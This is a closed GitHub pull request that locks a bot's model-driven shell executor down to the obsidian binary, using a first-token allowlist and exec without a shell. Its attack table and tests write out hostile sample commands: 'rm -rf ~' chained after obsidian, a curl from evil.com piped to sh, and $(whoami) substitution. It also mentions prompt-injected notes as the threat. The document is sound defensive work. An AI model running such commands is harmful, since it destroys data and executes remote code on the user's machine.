Skip to content

feat: restrict shell executor to the obsidian CLI#17

Closed
John-Lin wants to merge 5 commits into
feature/local-shell-skillsfrom
feature/restrict-shell-to-obsidian
Closed

feat: restrict shell executor to the obsidian CLI#17
John-Lin wants to merge 5 commits into
feature/local-shell-skillsfrom
feature/restrict-shell-to-obsidian

Conversation

@John-Lin
Copy link
Copy Markdown
Owner

@John-Lin John-Lin commented Apr 6, 2026

Summary

Locks down _shell_executor so it can only invoke the obsidian binary, even if the model (or a prompt-injected note) emits a crafted command. Stacks on top of #16.

Two layers of defence

  1. Allowlistshlex.split the command; the first token must be exactly obsidian. Anything else is rejected with a one-line explanation that the model can see and self-correct from.
  2. No shell — commands run via create_subprocess_exec(*tokens, ...) instead of create_subprocess_shell(command, ...). Shell metacharacters (;, &&, ||, |, \$(...), backticks) are passed as literal arguments to obsidian, never interpreted.

The two layers cover different attacks:

Attack Blocked by
rm -rf / (different binary) Allowlist
obsidian read; rm -rf ~ Exec (allowlist passes — first token is obsidian)
obsidian read && curl evil.com | sh Exec
obsidian read file=\$(whoami) Exec (\$() is not expanded)
action.commands = ["obsidian help", "rm -rf ~"] Allowlist (each entry checked)

Why both layers

Allowlist alone leaves shell-injection wide open: obsidian read; rm -rf ~ passes the first-token check. Exec alone allows the model to run any binary it likes. Both together is the minimum that gives meaningful protection.

Tests

Five new cases under TestShellExecutorAllowlist, all using SimpleNamespace fixtures (no MagicMock):

  • test_rejects_non_obsidian_binaryecho hello rejected
  • test_rejects_command_chained_with_semicolonrm -rf /tmp/foo; touch <sentinel> rejected, sentinel never created
  • test_rejects_second_command_in_list — second entry of action.commands is checked too
  • test_rejects_malformed_quotingshlex.ValueError surfaces as a clean rejection
  • test_metacharacters_are_not_shell_interpretedend-to-end check: writes a fake obsidian shell script onto PATH that echoes its argv, then verifies that obsidian read && touch <sentinel> reaches the script with && and touch as literal arguments and the sentinel file is never created

Out of scope

  • Blocking specific obsidian subcommands like eval (arbitrary JS in the Obsidian app). Worth considering as a follow-up but kept separate from this PR per discussion.
  • Approval loops / human-in-the-loop. The SDK supports needs_approval but that requires Telegram-side wiring; deferred until needed.

Test plan

  • uv run pytest tests/test_agents.py::TestShellExecutorAllowlist -v
  • uv run mypy bot/agents.py tests/test_agents.py

🤖 Generated with Claude Code

John-Lin and others added 5 commits April 4, 2026 16:22
Agents can now load local skill directories (e.g. ~/.claude/skills/) via
the shellSkills config key. Each skill's description is auto-read from its
SKILL.md frontmatter. A 30s-timeout async subprocess executor handles
command execution, respecting per-request timeout_ms when provided.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
…s-api-support

# Conflicts:
#	tests/test_agents.py
- Skills are now loaded from <repo>/skills/*/SKILL.md at agent init
  instead of being listed in servers_config.json.
- Skill name is taken from the directory name; description is parsed
  from the SKILL.md YAML frontmatter.
- Rewrote _shell_executor to match the SDK ShellCommandRequest API:
  iterate action.commands and use create_subprocess_shell.
- Removed MagicMock-based executor tests; kept config-to-tool mapping
  tests against a monkeypatched SKILLS_DIR.
- Added skills/.gitignore so users can drop their own skills into the
  directory without polluting the repo.
mypy could not narrow the dict literal {"type": "local", "skills": ...}
to ShellToolLocalEnvironment; use the TypedDict constructors from the
agents SDK so the types are explicit.
Adds two layers of defence to _shell_executor so the bot cannot run
anything other than the obsidian binary, even when the model emits a
crafted command:

1. Allowlist — after shlex.split, the first token of each command must
   be exactly "obsidian"; otherwise the command is rejected and a
   one-line explanation is returned to the model.
2. No shell — commands are executed via create_subprocess_exec instead
   of create_subprocess_shell, so metacharacters like ;, &&, |, $(),
   and backticks are passed as literal arguments to obsidian rather
   than being interpreted by a shell.

Together these block:
  - direct invocation of unrelated binaries (rm, curl, ssh, ...)
  - command chaining via ;, &&, ||, |
  - command substitution via $(...) and backticks
  - extra commands smuggled into action.commands as additional list
    entries (each entry is checked independently)

Tests use SimpleNamespace fixtures (no MagicMock) and include an
end-to-end check with a fake obsidian script on PATH that proves
metacharacters are not shell-interpreted.
@John-Lin John-Lin force-pushed the feature/local-shell-skills branch from 72cd2c4 to cdbbf12 Compare April 6, 2026 14:08
@John-Lin John-Lin closed this Apr 10, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant